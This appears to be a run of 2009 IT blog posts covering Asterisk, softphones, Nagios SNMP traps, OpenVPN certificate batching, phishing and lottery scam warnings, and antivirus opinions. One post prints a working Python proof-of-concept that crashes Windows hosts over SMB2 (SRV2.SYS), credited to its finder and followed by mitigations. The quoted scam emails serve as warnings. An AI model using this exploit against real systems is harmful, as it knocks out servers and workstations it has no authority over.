Asterisk wav to mp3 call recording converter script

We found a great article and combined with the comments/suggestions, we present a simple guide to get Asterisk WAV files converted to MP3

Source article: http://www.thiscoolsite.com/?p=73

My script is modified to use MLAME without modifying the date stamp and since i had some problems with the script on the above site, i think this below guide/script will definitely work on Debian (tested on Lenny).

Enjoy.

Pre-req Get LAME – Will already exist if use our Asterisk Install Script

cd /usr/src

wget http://downloads.sourceforge.net/project/lame/lame/3.98.2/lame-398-2.tar.gz?use_mirror=nchc

tar -zxvf lame-398-2.tar.gz

cd lame-398-2

./configure

make

make install

Copy MLAME

cp /usr/sr/lame-398-2/misc/mlame /var/spool/asterisk/monitor/

chmod +x /var/spool/asterisk/monitor/mlame

Get Script

cd /usr/src

wget http://www.intuitinnovations.com/downloads/runconverter

chmod +x runconverter

Modify script – If needed

nano runconverter

Create cron job with line like this

[Edit] - Encountered some issues where the MP3 out is 0kb...sigh. Will let you know what's up when i find a solution

/usr/src/runconverter &> /dev/null

Quick test

./runconverter

choice: best SIP softphone for Windows

Ever used soft phones that limit you to many many functions until you “unlock” them by purchasing a full version? Well, we all did and we too frown at those. Softphones such as Zoiper and X-Lite are amongst the famous ones but the lack functionalities on the free edition such as call conferencing, forwarding, sip TCP, sip TLS etc.

Well, after looking through *almost* all the soft phones found in this article http://www.venturevoip.com/news.php?rssid=2188, i found one that i would rate almost 9/10 for being FREE + its functionality.

Here’s Phonerlite, winner of the list of softphones (without IM, Video),

Yes, yes, it doesn’t have a fancy skin or 3D images here and there but this piece of software does all what those other free ones want you to pay money for. It lets you do conferencing, forwarding, sipTCP, sipTLS, IPv6, detailed log, phonebook and yes, STATISTICS to see how good/bad the current connection is in real time. Wow, now that’s just awesome.

Those in hurry to get it, here’s link for downloads http://www.phonerlite.de/download_en.htm

There’s a BETA which you can play around with and test. You can also run it straight off a portable device without any installs, with this file  http://www.phoner.de/PhonerLite.paf.exe

Installation is pretty brain dead, straight forward. They even have a Wizard to setup your account. One thing it lacks is an automatic start but that isn’t much a hassle to do in Windows, just make a shortcut of the executable and drag it into the “Startup” menu in your START menus.

If you do try it and wonder how to conference its easy. When a call comes in, just hit the conference button, dial another extension or as many extensions as you wish and everyone’s conferencing.

To forward, if a call comes, dial another extension, drag and drop the current call to the intended recipient. Careful not to drag drop many calls, this software is not intended to replace a receptionist system such as FOP or a receptionist board.

Nagios Receive SNMP Traps (with SNMPTT)

SNMPTT (SNMP Trap Translator) interacts with snmptrapd to receive traps and process them into Nagios by matching the IP of the trapping host to a host in Nagios and changing a passive check in Nagios to alert someone.

In the below guide:

[APC-UPS] –>send traps to–> [SNMPTRAPD –> SNMPTT –> NAGIOS]

Here’s a simple guide, adapted and made much more cut and dry (and a little more simpler) from the guide found here.

We use Nagios 3.20, SNMPTT 1.3beta2, Debian Lenny (5). This below is fully tested based on Daniel’s script for installing Nagios 3.20 found here.

As usual, your feedback will mean a lot to us. Thanks!

Sanjay.

Download some pre-reqs
=======================

Main component is SNMP (and some snmp tools) so do this at the CLI

apt-get install snmp snmpd libsnmp-dev

SNMPTT setup starts
===================
1) apt-get install unzip

2) cd /usr/src

3) wget http://search.cpan.org/CPAN/authors/id/C/CH/CHORNY/Text-ParseWords-3.27.zip

4) unzip Text-ParseWords-3.27.zip

5) cd Text-ParseWords-3.27

6) perl Makefile.PL

7) make test

8) make install

9) perl -MCPAN -e shell

At the Perl CLI
install YAML
install Getopt::Long
install Config::IniFiles
install Time::HiRes
install Sys::Hostname
install Text::Balanced
install Sys::Syslog
install DBI
install DBD::mysql
install Crypt::DES
install Digest::MD5
install Digest::SHA1
install Digest::HMAC
install Net::SNMP

Download, install and configure snmptt (the magician)
=====================================================

10) cd /usr/src

11) wget http://downloads.sourceforge.net/project/snmptt/snmptt/snmptt_1.3beta2/snmptt_1.3beta2.tgz?use_mirror=nchc

12) tar -zxvf snmptt_1.3beta2.tgz

13) cd snmptt_1.3beta2

14) cp snmptthandler /usr/sbin

15) cp snmptt /usr/sbin

16) cp snmpttconvert /usr/sbin

17) cp snmpttconvertmib /usr/sbin

Configure snmptrapd to not log but send them to snmptt
======================================================
18) nano /etc/snmp/snmptrapd.conf

19) Enter the following lines in there

traphandle default /usr/sbin/snmptt
disableAuthorization yes
donotlogtraps yes

Configure and enable the snmptrapd as a service
===============================================
20a) nano /etc/default/snmpd and /etc/init.d/snmpd

TRAPDRUN=yes
TRAPDOPTS='-On -Lsd -p /var/run/snmptrapd.pid'

20b) /etc/init.d/snmpd start

21) netstat -an | grep "162"
>> Should see output

22) cd usr/src/snmptt_1.3beta2

23) cp snmptt.ini /etc/snmp

24) nano /etc/snmp/snmptt.ini, look for and change the following settings

net_snmp_perl_enable = 1
dns_enable=1

25) cd /usr/src/nagios-plugins-1.4.13/

26) mkdir /usr/local/nagios/libexec/eventhandlers

27) cd /usr/local/nagios/libexec/eventhandlers

28) wget http://www.intuitinnovations.com/nagios/download312/submit_check_result

29) chmod +x submit_check_result

TESTING - Create sample to test
===============================
30) cd /usr/share/snmp/mibs
31) wget http://www.intuitinnovations.com/nagios/download312/PowerNet-MIB.mib

32) snmpttconvertmib --in=PowerNet-MIB.mib --out=/etc/snmp/snmptt.conf.apcpower --exec='/usr/local/nagios/libexec/eventhandlers/submit_check_result $r TRAP 1'

Here, the line above, you can change TRAP to any name as long as it matches the Service name in Nagios and 1 is the alert type, 0=OK, 1=WARNING, 2=CRITICAL etc..

33) nano /etc/snmp/snmptt.ini

add the /etc/snmp/snmptt.conf.cpqpower in [TrapFiles], comment out snmptt.conf
Example: Here we added /etc/snmp/snmptt.conf.apcpower based on the snmpttconvertmib outputfile like above

[TrapFiles]
snmptt_conf_files = <<END
/etc/snmp/snmptt.conf.apcpower
END

Enable log rotation
=======================
34) nano /etc/logrotate.conf
This is for log rotation. Add the following line at the end

/var/log/snmp/snmptt.log /var/log/snmp/snmpttunknown.log
{
missingok
}

35) mkdir /var/log/snmptt

36) touch /var/log/snmptt/snmptt.log

37) touch /var/log/snmptt/snmpttunknown.log

Configuring hosts file
=======================
Traps send IP not name, so we must configure /etc/hosts to add the name and ip of the device sending traps to us

38) nano /etc/hosts

Add the following as sample

192.168.1.11 sanjaypc

>> Important! This name will be the same as your hosts.cfg file in nagios that will receive the traps

Send a sample trap: - Load the same MIBs into a program like ireasoning and send a trap to your nagios IP
=======================================================

39) tail -f /var/log/snmptt/snmptt.log
Sun Nov 8 09:09:11 2009 .1.3.6.1.4.1.318.0.5 WARNING "Status Events" 192.168.157.1 - APC UPS: On battery: The UPS has switched to battery backup power.

40) tail -f /var/log/messages --- Output (after configuring Nagios settings below - or at least have a host/service defined that matches sanjaypc and TRAP)
Nov 8 09:09:20 server1 nagios: PASSIVE SERVICE CHECK: sanjaypc;TRAP;1;APC UPS: On battery: The UPS has switched to battery backup power.

Configuring Nagios- Sample definitions
=====================================

trap-service template
=====================================

define service{
name generic-service
register 0
check_period 24x7
max_check_attempts 3
normal_check_interval 15
retry_check_interval 5
active_checks_enabled 1
passive_checks_enabled 0
parallelize_check 1
obsess_over_service 0
check_freshness 0
event_handler_enabled 0
flap_detection_enabled 0
process_perf_data 1
retain_status_information 1
retain_nonstatus_information 1
notification_interval 60
notification_period 24x7
notification_options w,u,c,r
notifications_enabled 1
}

define service{
name trap-service
use generic-service
register 0
service_description TRAP
is_volatile 1
check_command check-host-alive
max_check_attempts 1
normal_check_interval 1
retry_check_interval 1
passive_checks_enabled 1
check_period none
notification_interval 0
contact_groups admins
}

Create service to host - NOTE: Hostname must match to /etc/hosts definition we created earlier
==================================================

define service{
host_name sanjaypc
use trap-service
contact_groups admins
}

41) Restart nagios

42) Send a trap again and check Nagios website, it should turn yellow [WARNING] and a notificaiton sent out

Nagios Send SNMP Traps

We hope this small guide can help you quickly setup your SNMP traps out to a remote management host.

First thing do ensure that your Nagios box has the snmptrap binary and perhaps all other associated SNMP binaries installed. If you haven’t a good start would be to use the following lines:

This guide was made using Nagios 3.2.0, Debian 5

Debians..

apt-get install snmp snmpd libsnmp-dev

Redhats..

yum install net-snmp net-snmp-utils net-snmp-devel –y

In Nagios, we setup to have SNMP traps to send out to a HP OpenView box in our customer’s corporate network. These traps are sent as Event Handlers in Nagios. You may try doing them as normal notifications (i guess, haven’t tested).

So, each time there’s a state change (e.g. from OK to Warning), you will get, beside the standard notifications, an event that triggers a snmp trap to a remote management host.

To make things simple, we use existing config definitions such as the original commands.cfg and the linux-services.cfg. The following guide attempt to send a trap when there’s more than 2 or 3 users logging onto the nagios (localhost) box.

First, edit the commands.cfg file and add the following lines. I will explain what these lines mean.

define command{    command_name send_snmptrap    command_line /usr/bin/snmptrap -v 2c -c public 192.168.2.22 '' NAGIOS-NOTIFY-MIB::nSvcEvent nSvcHostname s "$HOSTNAME$" nSvcDesc s "$SERVICEDESC$" nSvcStateID i $SERVICESTATEID$ nSvcOutput s "$SERVICEOUTPUT$" }

Simply copy paste everything and it should actually be single lines something like below;

The command name can be anything you wish, just as long it’s mentioned correctly in the _x_services.cfg files.

/usr/bin/snmptrap –v 2c –c public 192.168.2.22…

This is quite straightforward, here, we attempt to send SNMPv2 with the community string of public to the remote server 192.168.2.22.

…'' NAGIOS-NOTIFY-MIB::nSvcEvent nSvcHostname s "$HOSTNAME$" nSvcDesc s "$SERVICEDESC$" nSvcStateID i $SERVICESTATEID$ nSvcOutput s "$SERVICEOUTPUT$"

This part above firstly, feeds the Nagios MIBs so that we can use easy readable words such as NSvcDesc instead of OID numbers. It would be a good idea to give the Nagios MIBs to the 3rd party remote monitoring host as well.

[EDIT: UPDATE: – The Nagios MIB has a wrong definition or its actually meant for V2 of Nagios. Use this MIB which should work for V3]

The next few fields are completely up to you and what you wish Nagios to output to the trap receiver. In my case, $HOSTNAME$ – The monitored host, $SERVICEDESC$ – service description, $SERVICESTATEID$ – the Nagios state id like 0 for OK, 1 – for warning etc…and $SERVICEOUTPUT$ – The additional info field from the plug-in is sufficient. You may add more if you like where you deem necessary.

The Macros ($name$) are defined well in Nagios documentation. The n(typeID) are found in the MIB files, so do match them well. Some fields have been changed from Integer (i) to octect string (s) and this may cause your traps to fail. Whatever the case is, you can simulate the trap at the CLI such as

snmptrap -v 2c -c public 192.168.2.22 '' NAGIOS-NOTIFY-MIB::nSvcEvent nSvcStateID s “$SERVICESTATEID$”.

This will give errors as nSvcStateID in the MIB is expecting an Integer value, so changing to

nSvcStateID i $SERVICESTATEID$

Will then work. Etc..

Now, the command to execute and send traps out is ready. Now we tell which service/host is to execute this command in a state change (triggering the event handler).

Here’s a sample of my linux-services.cfg

define service{   use                         debian5-linuxservice   host_name                   Nagios-Server   service_description         Current Users   event_handler               send_snmptrap   event_handler_enabled       1   check_command               check_local_users!2!3   }

NOTE: Check local users thresholds are normally much higher but for testing, i just made it warn at 2 users and critical at 3.

The only two parts i added from the normal service definition are;

event_handler            send_snmptrap
event_handler_enabled    1

That’s all is needed for hosts or services to send traps out with the configured output as above when a state change happens.

send_snmptrap is the logical name i created for that command in commands.cfg. Well, that’s about it. Simple right? Now, just restart your nagios to enable the above configs.

/etc/init.d/nagios restart

And test the traps by sending a passive check in Nagios WEB UI to for example, Warning or Critical.

Also, if you would like to test receiving traps, i can recommend you the free iReasoning SNMP toolset. There’s a paid one if you like the rich features of this tool but the free one has limited functions.

Now, for iReasoning, launch the MIB Browser tool. Do load the Nagios MIB to make things much prettier. File >> Load MIBs and select Nagios-Notify-MIB. Now, click on Tools >> Trap Receiver.

In the remote management host value (in my case was 192.168.2.22) enter the IP where iReasoning is running. Ensure your windows firewall enables incoming port UDP 162 for snmptraps if you enable WF.

Trigger something and see it work. See sample from iReasoning below.

NOTE: Whenever you change something in the config files, remember to restart Nagios.

Please do comment and give further suggestions.

Shoutout to Daniel for figuring out the final bits with me … :)

Did someone ask you to update certificates? Well Don’t!

If you get a mail from just about anyone requesting you to update certificates on your computer. D.O.N.T.

The mail you get may look like this:

On October 16, 2009 server upgrade will take place. Due to this the system may be offline for approximately half an hour. The changes will concern security, reliability and performance of mail service and the system as a whole. For compatibility of your browsers and mail clients with upgraded server software you should run SSl certificates update procedure. This procedure is quite simple. All you have to do is just to click the link provided, to save the patch file and then to run it from your computer location. That's all. http://evil-link/evil-file Thank you in advance for your attention to this matter and sorry for possible inconveniences.

These are new breed of social engineering that attempts to fool someone into updating their certificates which in turn adds a root certificate of the attacker therefore validating all his websites, software and whatever that uses certificates as VALID.

This would then make it easier for someone to convince you that www.maybank2u.com.my is actually their own webserver as there won’t be any prompts saying the certificate is invalid.

In Windows, only use Windows Update to update your root certificates. This is done securely by Microsoft and MS is probably the folks you can trust in this case.

If you receive this and you think it could be from an internal IT team, it’s probably not the case. Do get facts and ask your IT Department.

Office 2010 protects documents from untrusted sources like the internet

Typically, when you open something through MSWord, Excel through direct download, all components within that document such as internet links, scripts or procedures may be enabled (depending on your security levels).

One feature i really like in Office 2010 is the fact that the software “knows” and treat whatever office documents downloaded via the internet and mark them as “public/unsafe”

Documents opened in Protected View (as its called) prevents malicious codes from being executed through sandboxing the application or isolating its process.

When launching a document in this mode, the task manager shows 2 processes of winword.exe (Microsoft word executable binary). Assuming that one of it is the original application running in normal mode but the one with the smaller memory footprint is probably the one being sandboxed (reduced functionality).

Once you’ve accepted to edit, see the ENABLE EDITING button on top right, it will execute the process in normal view and the so called sandboxed version is no longer in memory.

Protected view prevents application attacks that attempt to inject and run code by enabling features such as ASLR, DEP and /GH.

I like this. Helps users be automatically protected, view the content first (incase curiosity gets the better of you) and then decide to “enable” the document in normal view.

Good stuff!

Have a wonderful weekend.

Microsoft Internet Lottery Scam

These guys get smarter. To avoid being tagged spam, they send the main content body through word document. So it sailed pass the Hotmail antispam service and right into my inbox. Anyway, just share with you how ridiculously funny this is.

To top that, it comes from a yahoo address: evansokoli8@yahoo.com 

MICROSOFT INTERNET LOTTERY AWARD 2009 MORLEY HOUSE, 26-30 HOLBORN VIADUCTS, LONDON EC1A 2BP.U.K. Dear Email Owner, We are pleased to inform you that you have won a prize money of GBP800,000.00 British Pounds (Eight Hundred Thousand British Pounds) Only for the email users this 2009 Prize promotion which is organized by MICROSOFT, We Collects all the email addresses of people worldwide, that are active online this 2009, among the millions that subscribed to MICROSOFT, HOTMAIL, YAHOO, GMAIL and few from other e-mail providers, 12 people are selected monthly to benefit from this promotion and you are one of the Selected Winners this month of SEPTEMBER 2009. Your email address has therefore been approved to claim a total sum of (GBP800,000.00 BRITISH POUNDS) in cash. FILE NUMBER: MIC/903/KPC/0108308/09. 1. Your Full Names: 2. Your Country: 3. Telephone Number: 4. Occupation: 5. Age: To file for your claim, you are advised to contact our appointed paying bank below without any further delay, because your payment file has been forwarded to them for urgent payment of your winning prize, contact MR. STEPHEN HESTER Below as soon as you receive this massage and remember to forward him the Above File Number And Information’s which will help him to know that you are the rightful beneficiary, then he will instruction you on what to do next to receive your fund. PAYMENT BANK CONTACT INFORMATION: BANK NAME: ROYAL BANK OF SCOTLAND LONDON-UK CONTACT PERSON: MR. STEPHEN HESTER FOREIGN REMITTANCE DEPARTMENT Tel: +44-703-174-7509 Fax: +44-870-471-8189 Tel/Fax: +44- 844-774-4940 Contact Email: stephenhester@mycin.net WARNING: Any Prize that is not claim within 29 working days from the day you where notified will turn void and invalid, and You are advised to keep your winning information confidential until your claims are processed and your fund remitted to your bank account. This is part of our precautionary measure to avoid double claiming and unwarranted abuse of this program by some unscrupulous elements. For more clarifications, please contact MR. JOHN WILLIAMS through his contact email address: johnwilliams63@live.co.uk Congratulations once again, Mr. Evans Okoli. Head Customer care Service Microsoft Promotion Team Our special thanks and gratitude to Chairman CEO MICROSOFT Bill Gates and his associates we wish you the best of luck. Thank you for being part of our promotional award program and commemorative Anniversary. © Copyright 2009 Microsoft Lottery promotion All Right Reserve"

Forefront TMG NIS protects against SMB2.0 attacks

Microsoft has added protection against exploits targeting a vulnerability in the Server Message Block (SMB) implementation in mere hours. However, only customers running the Forefront TMG Network Inspection System can breathe easy. The Redmond-based company informed that the protection against the Critical zero-day vulnerability in SMB 2.0 was the first 0-Day signature release ever introduced to Forefront TMG NIS, according to Avi Ben-Menahem, Group Manager, Network Inspection System.

“In a matter of hours we completed root-cause analysis, signature development, testing and publishing of a new signature snapshot. During this process, which is driven by the Microsoft Malware Protection Center (MMPC), the team was able to demonstrate the agility of the core NIS technology and exercise the technologies and tools built over time to release a signature for theVuln:Win/SMB2.Srv2.DoS!2009-3103 vulnerability in just a few hours,” Ben-Menahem revealed.

Want to try it out? Download here

Windows SMB2 'SRV2.SYS' Remote Denial of Service Exploit (and screen shots on Windows 2008 SP2)

There’s a simple exploit code on SMB2 protocol (implemented in the newer OSes of Microsoft) that can easily remote BSDO a Windows server or client. SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE PROTOCOL REQUEST functionality. The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send to a SMB server, and it's used
to identify the SMB dialect that will be used for further communication.

POC

Tried and tested this on Windows 2008 R2 x32 on VirtualBox and it crashed that bad boy the instance i pressed enter. At the time of posting, that same server, which is my AD server (meant for a security seminar in Penang) just won’t boot! anymore…F@!@@!!!…   and LOL at the same time.

I had to boot with “Last known good configuration” and that brought the DC up again.

The exploit was done on Debian.

Also tried it on my x64 Windows 7 (also using SMB2.0) RTM Build 7600 but nothing happened. This means, Microsoft was informed of the bug and fixed it on the RTM build

All credits to Laurent Gaffié

Here’s the exploit code. You need to have file and print sharing enabled on Windows as well and of course, the firewall would allow file and print sharing from the network(s) that you are in.

#!/usr/bin/python # When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field # it dies with a # PAGE_FAULT_IN_NONPAGED_AREA from socket import socket from time import sleep host = "IP_ADDR", 445 buff = ( "\x00\x00\x00\x90" # Begin SMB header: Session message "\xff\x53\x4d\x42" # Server Component: SMB "\x72\x00\x00\x00" # Negociate Protocol "\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853 "\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe" "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54" "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31" "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00" "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57" "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61" "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c" "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c" "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e" "\x30\x30\x32\x00" ) s = socket() s.connect(host) s.send(buff) s.close()

Be responsible, exploit test machines only :D please

Mitigation techniques:

1) Disable SMB / File and Print Sharing (this is tough …i know)
2) Enable host level IDS to detect this signature or custom make your own.
3) Enable firewalls to block SMB traffic from unknown sources (with the hope no one does this in the so called trusted network)

The following platforms are vulnerable ( i didn't test then personally though)

Microsoft Windows Vista x64 Edition SP2
Microsoft Windows Vista x64 Edition SP1
Microsoft Windows Vista x64 Edition 0
Microsoft Windows Vista Ultimate 64-bit edition SP2
Microsoft Windows Vista Ultimate 64-bit edition SP1
Microsoft Windows Vista Ultimate 64-bit edition 0
Microsoft Windows Vista Home Premium 64-bit edition SP2
Microsoft Windows Vista Home Premium 64-bit edition SP1
Microsoft Windows Vista Home Premium 64-bit edition 0
Microsoft Windows Vista Home Basic 64-bit edition SP2
Microsoft Windows Vista Home Basic 64-bit edition SP1
Microsoft Windows Vista Home Basic 64-bit edition 0
Microsoft Windows Vista Enterprise 64-bit edition SP2
Microsoft Windows Vista Enterprise 64-bit edition SP1
Microsoft Windows Vista Enterprise 64-bit edition 0
Microsoft Windows Vista Business 64-bit edition SP2
Microsoft Windows Vista Business 64-bit edition SP1
Microsoft Windows Vista Business 64-bit edition 0
Microsoft Windows Vista Ultimate SP2
Microsoft Windows Vista Ultimate SP1
Microsoft Windows Vista Ultimate
Microsoft Windows Vista Home Premium SP2
Microsoft Windows Vista Home Premium SP1
Microsoft Windows Vista Home Premium
Microsoft Windows Vista Home Basic SP2
Microsoft Windows Vista Home Basic SP1
Microsoft Windows Vista Home Basic
Microsoft Windows Vista Enterprise SP2
Microsoft Windows Vista Enterprise SP1
Microsoft Windows Vista Enterprise
Microsoft Windows Vista Business SP2
Microsoft Windows Vista Business SP1
Microsoft Windows Vista Business
Microsoft Windows 7 for x64-based Systems 0
Microsoft Windows 7 for Itanium-based Systems 0
Microsoft Windows 7 for 32-bit Systems 0
Microsoft Windows 7 beta

And to add from my test, Windows 2008 with SP2.

Microsoft posted this advisory but basically it doesn’t fix anything but just workaround to prevent SMB(2): http://www.microsoft.com/technet/security/advisory/975497.mspx

openVPN easyrsa batch em "build-key"

We were deploying a solution for our customer, Pizza Hut/KFC Malaysia which deploy pfSense as a VPN gateway and firewall to a little under 300 outlets in Malaysia.

Each outlet has a unique “storeID” which is then required to run OpenVPN daemon at the background and fires a connection whenever a layer 2 link is established.

To create under 300 certificates using OpenVPN’s (v2.x.x) easyrsa scripts on a CentOS clients isn’t funny. So being a lazy ass, i wrote a simple way to help to create these files fast!

Assuming you’ve got the whole works with OpenVPN and pfSense sorted. If not read this great document here. Once you’ve got the server side done on pfSense, you will need to generate more keys for (in this case, Pizza Hut’s) 300 branches peer certificates.

Snail factor

• Build-key prompts amongst other things the commonName or server name each time a certificate is to be generated

What is needed?

• To create store certificates that automatically creates the certificates without prompt and also using a $variable$ to “insert” the commonName value. This means, a certificate will be created with the storeID.key and storeID.crt and the storeID.csr

How - Conceptually?

1. Automate the build-key file to disable prompts
2. Fire a variable into the system to pickup the $variable$ which then will be the filename and the commonName

How – Technically

(Assumptions – easyrsa is in /etc/openvpn/easyrsa and keys are in /etc/openvpn/easyrsa/keys. In /easyrsa, you have all the scripts like build-ca, build-key)

Create a file called build_batch into /etc/openvpn/easyrsa with the following lines. Make the file executable chmod +x build_batch

#!/bin/sh if test $# -ne 1; then echo "usage: batch-build <name>"; exit 1 else export KEY_CNAME=$1 ./build-key $1 fi

Now, edit (nano/vi) the openssl.cnf file in the /etc/openvpn/easyrsa look for the following lines

commonName            = Common Name (eg, your name or your server\'s hostname) commonName_max            = 64

Add a new line like below and save the file.

commonName            = Common Name (eg, your name or your server\'s hostname) commonName_max            = 64 # Add this line below commonName_default        = $ENV::KEY_CNAME

Now, edit (nano/vi) the build-key in that same directory. At the end of the openssl –req and openssl ca statements, add the –batch argument.

This is how part of the original file look like

openssl req -days 3650 -nodes -new -keyout $1.key -out $1.csr -config $KEY_CONFIG && \ openssl ca -days 3650 -out $1.crt -in $1.csr -config $KEY_CONFIG && \

We modify to add –batch at some part of the line like below and save the file

openssl req -days 3650 -nodes -new -keyout $1.key -out $1.csr -batch -config $KEY_CONFIG && \ openssl ca -days 3650 -out $1.crt -in $1.csr -batch -config $KEY_CONFIG && \

Now you’re ready to run in batch. But before that, please feed the vars in the environment like below in /etc/openvpn/easyrsa

source vars

Run a sample like below

./build_batch test01

This will build the test01.crt, test01.csr and test01.key automatically in /etc/openvpn/easyrsa/keys with the commonName test01 also :)

Done.

Now, if you want to do lots of these, use this Excel below

Exceleasy-rsa-linemaker.xls

Use the Excel file (build-cert sheet) to generate script lines (see the excel sample) so you can copy and paste into a SSH remote session in the appropriate directory.

Copy in batch up to 50 lines (within buffer) from the copypaster column and paste via a SSH session into the /etc/openvpn/easyrsa and it will generate without prompting anything. Quick and easy.

To remove/revoke certs, do the same but use the Excel’s revoke-cert sheet.

<Ignore CRL/STR_COPY issues, i don’t have CRLs defined>

If things mess up a lot, just run. Warning, this will remove your CA, server and dh information which you then need to repopulate inside pfSense.

./clean-all

After clean-all you must recreate all below

./build-ca ./build-key-server ./build-dh

Then re run the above stuff.

Microsoft Security Essentials 1.0 BETA vs. Kaspersky 2010

My colleague Henry asked to scan his USB he suspect a virus is lurking in there. I have both Kaspersky and MSE running in real-time.

MSE detects and Kaspersky snoozed!.

It was Win32/Vorus.CV

And MSE cleans it. I am confident with this product. Since it’s gonna be free, i am a full supporter and advocator of MSE. Use it try and have a trouble free computing environment.

PS> Want a copy of MSE? I can give it to you but you have to write to me for with your email addy.

Immunet - Antivirus Cloud Computing

Immunet, a startup by Symantec senior execs take Antivirus to the cloud. Immunet attempts to aggregate the results and "opinions" of threats from people using this service. This means, if Bob gets an infection from Saudi Arabia, Immunet alongside your antivirus will then update everyone in this Immunet community about the threat in realtime and get protected from this threat.
They also plan to protect social networking and other communities (probably Twitter, etc..)

Interesting concept. Could Computing Antivirus.

In summary, this is like every single immunet user would then be a possible contributor to protect all other immunet users in realtime.

Checkout their narrative:

Immunet Protect is free, light weight, cloud based Anti-Virus software which uses new approaches to provide malware protection. It is designed to work alongside Symantec, AVG and Mcafee to provide significantly improved detection rates in those products. You can also install it alone. Immunet works by providing its own fast and light layer of cloud based virus detection on top of your existing Anti-Virus product. Once you have Immunet installed it ties you into the Immunet Cloud and allows you to build communities of friends and family. When Immunet Protect detects a threat on your system it automatically makes available protections for it to everyone in your community and to the global community protecting them instantly.

Checkout and download. It doesn’t work on my Windows 7 X64 RTM tho :(. So i had to put it on my XP32 running AVG. Perfect!

Currently, this product works better with those three AV products. I am using Kaspersky + Microsoft Security Essentials Beta, so probably i wont benefit much but probably some security information when a bug/security threat is detected on Windows. (not sure..shall try).

Requirements

Microsoft Windows XP with Service Pack 2 or later
* 300MHz or faster processor
* 256MB of RAM
* 10 MB of available hard disk space
Microsoft Windows Vista Home Basic/Home Premium
* Supports 32-bit platforms only at this time
* Must meet the minimum Windows Vista operating system requirements
Windows 7 (RC)
* Supports 32-bit platforms only at this time
* Must meet the minimum Windows 7 (RC) operating system requirements
Required for all installations:
* A working Internet connection

http://www.immunet.com

Note, this product is a pre-release i.e. BETA, so use with discretion.

Above: Number of people online and threats it can clean!!!, not bad.

INTERESTING. After about 20 minutes into writing this, the protection increases by 2!!!!!…SUPER COOL. There were no updates and downloads of threat patterns. Realtime, hell yeah!

If i click the threat meter..

nsDialogs.dll is apparenly “safe”

Settings and such.

To participate, you need to register. Without registering you wont be able to “help” others :)

Click on register and go get a new account at www.immunet.com. Then immediately sign in and you should be able to see like below;

Join the cloud? Let us know the experiences.

My views on free VS. premiere security products.. and Microsoft’s Antivirus?

It's interesting how one AV product suppress the other in just a matter of months. Look at the graphs produced by those so called independent testers. A sample here. Its a big war of AV companies out there.

My problem is, it's sickening to know that we as consumers are always confused with all their gimmicks about free vs premiere/paid editions. You cannot do that with security products! <period>. Give it for 100% or don’t give it at all.

My take on it is, if you want to give something free, give it 100% (and the world shall love you for it). Tearing down features for free Vs. full versions is like saying "you get the car for free but the brakes work only 50%. So be careful. If you want full braking then you need to pay". This is their message and how i see it. This is also why the open source world keeps propelling and gaining mileage. They fall under the GPL which do not allow licenses to be sold, so how they profit? Professional support and services...

Know this…I am not talking about features, that’s different, maybe your security product perform system wide application update, now, that’s a feature, security such as filtering through different protocols, email filtering, web filtering for example, shouldn’t be a “paid” feature..it should just be a standard one.

Anyway, Microsoft will also soon be in the chase, prime time. Its called MS Security Essentials dubbed Morro- a new free AV for PCs (they stopped beta test downloads already so its getting ready for RC).

Combined with Security Center, Windows Update, MS Firewall, its almost a full desktop security suite. However, it's yet to get the real world challenge, this is a fact. So, wait till it releases and we shall all see. (Word to note, HOME PC…) So, not sure where this is going for corporations, yet.

From a commercial point this service will seriously dent the rest of the commercial AV market, no doubt, but again, i would rather get an AV at 100% free than of those "free but we wont give you 100% brakes" ones...This is good for consumers, the competition will ease of our pockets for sure.

I bet there will be certain camps that will say its from Microsoft, we can't trust bla bla, just so you know, MS products are seriously “tested” (ie smothered and smacked) by millions of testers worldwide as soon as it sees daylight, every second, even at the point i am writing this, this is why you get lots of "bugs/problems" reported, so effectively, for me, as security paranoia, i rather have those bugs exposed, fixed than have/use a product that no one knows if its a big ass Swiss cheese or not. I don’t really care about the games the corporations play, i just want good quality software.

Possible new breed of mass spreading worms ? New vulnerabilities found in MS products.

Microsoft Office OWC10.Spreadsheet ActiveX BorderAround() Heap Corruption Vulnerability

The specific vulnerability exists in the OWC10.Spreadsheet.10 ActiveX control installed by Microsoft Office. By accessing specific methods in a certain order heap corruption occurs leading to remote code execution. If exploited, complete control of the affected system can be achieved under the rights of the currently logged in user.

[http://www.securityfocus.com/archive/1/505679]

This looks like a perfect candidate for a possible mass spreading worm from a newly discovered (and patched) vulnerability in Microsoft Office Web Components.

• Office XP, Office XP Web Components, and Office 2000 Web Components (all editions)
• Office 2003, Office 2003 Web Components, and Office 2003 Web Components for the 2007 Microsoft Office system (all editions)
• Internet Security and Acceleration Server 2004 and Internet Security and Acceleration Server 2006 (all editions)
• Microsoft BizTalk Server (all editions)
• Visual Studio .NET 2003 (all editions)
• Microsoft Office Small Business Accounting 2006 (all editions)

Especially those running ISA server, this is seriously critical. You must get patched, get secure.

Since the attack takes the permission of the logged on user, it is possible that UAC will prevent privileged tasks from the remote exploit attempt.

Patch immediately or stand a chance to be part of the statistics (hopefully not)

http://www.microsoft.com/technet/security/bulletin/MS09-043.mspx

Logging on to Windows 2008 domain as an administrator on Windows 7 domain computer

This has probably been blogged a thousand times but let me be the 1001th ..blogger ;).

Thought I’d share this from Windows 7 perspective instead.

So, here’s the rundown:

• I got myself W2008 R2 and Windows 7 RTM up and running, joined the domain and stuff.

Ok, so the thing is, when you use the logon UI from Vista/Windows 7, it does “see” the domain it just joined and sets it up for you by default as your default domain (there’s no more pull down domain lists).

